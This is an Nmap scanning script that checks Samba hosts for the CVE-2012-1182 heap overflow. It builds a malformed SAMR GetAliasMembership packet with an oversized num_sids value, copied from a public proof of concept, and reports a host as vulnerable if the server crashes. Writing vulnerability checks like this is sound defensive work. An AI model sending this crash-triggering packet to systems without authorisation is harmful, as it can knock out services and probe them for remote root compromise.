scripts/samba-vuln-cve-2012-1182.nse


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130

local msrpc = require "msrpc"
local smb = require "smb"
local string = require "string"
local vulns = require "vulns"
local stdnse = require "stdnse"

description = [[
Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.

Samba versions 3.6.3 and all versions previous to this are affected by
a vulnerability that allows remote code execution as the "root" user
from an anonymous connection.


CVE-2012-1182 marks multiple heap overflow vulnerabilities located in
PIDL based autogenerated code. This check script is based on PoC by ZDI
marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray
function where an attacker is under control of num_sids and can cause
insufficient memory to be allocated, leading to heap buffer overflow
and possibility of remote code execution.

Script builds a malicious packet and makes a SAMR GetAliasMembership
call which triggers the vulnerability. On the vulnerable system,
connection is dropped and result is "Failed to receive bytes after 5 attempts".
On patched system, samba throws an error and result is  "MSRPC call
returned a fault (packet type)".

References:
* https://bugzilla.samba.org/show_bug.cgi?id=8815
* http://www.samba.org/samba/security/CVE-2012-1182

]]

-----------------------------------------------------------------------
---
-- @usage
-- nmap --script=samba-vuln-cve-2012-1182  -p 139 <target>
-- @output
-- PORT    STATE SERVICE
-- 139/tcp open  netbios-ssn
--
-- Host script results:
-- | samba-vuln-cve-2012-1182:
-- |   VULNERABLE:
-- |   SAMBA remote heap overflow
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2012-1182
-- |     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- |     Description:
-- |       Samba versions 3.6.3 and all versions previous to this are affected by
-- |       a vulnerability that allows remote code execution as the "root" user
-- |       from an anonymous connection.
-- |
-- |     Disclosure date: 2012-03-15
-- |     References:
-- |       http://www.samba.org/samba/security/CVE-2012-1182
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182

author = "Aleksandar Nikolic"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln","intrusive"}

hostrule = function(host)
  return smb.get_port(host) ~= nil
end

action = function(host,port)

  local result, stats
  local response = {}

  local samba_cve  = {
    title = "SAMBA remote heap overflow",
    IDS = {CVE = 'CVE-2012-1182'},
    risk_factor = "HIGH",
    scores = {
      CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)",
    },
    description = [[
Samba versions 3.6.3 and all versions previous to this are affected by
a vulnerability that allows remote code execution as the "root" user
from an anonymous connection.
]],
    references = {
      'http://www.samba.org/samba/security/CVE-2012-1182',
    },
    dates = {
      disclosure = {year = '2012', month = '03', day = '15'},
    },
    exploit_results = {},
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  samba_cve.state = vulns.STATE.NOT_VULN

  -- create SMB session
  local status, smbstate
  status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)
  if(status == false) then
    return false, smbstate
  end

  -- bind to SAMR service
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
  if(status == false) then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  -- create malicious packet, same as in the PoC
  local data = string.pack("<I4",4096)  -- num_sids
    .. "abcd"
    ..string.pack("<I4I4I4",100
      ,0
      ,100)
    ..string.rep("a",1000)

  local marshaledHandle = string.rep("X",20)
  status, result = msrpc.samr_getaliasmembership(smbstate,marshaledHandle, data)
  stdnse.debug2("msrpc.samr_getaliasmembership: %s, '%s'", status, result)
  if(status == false and string.find(result,"Failed to receive bytes after 5 attempts") ~= nil) then
    samba_cve.state = vulns.STATE.VULN -- connection dropped, server crashed
  end

  return report:make_output(samba_cve)

end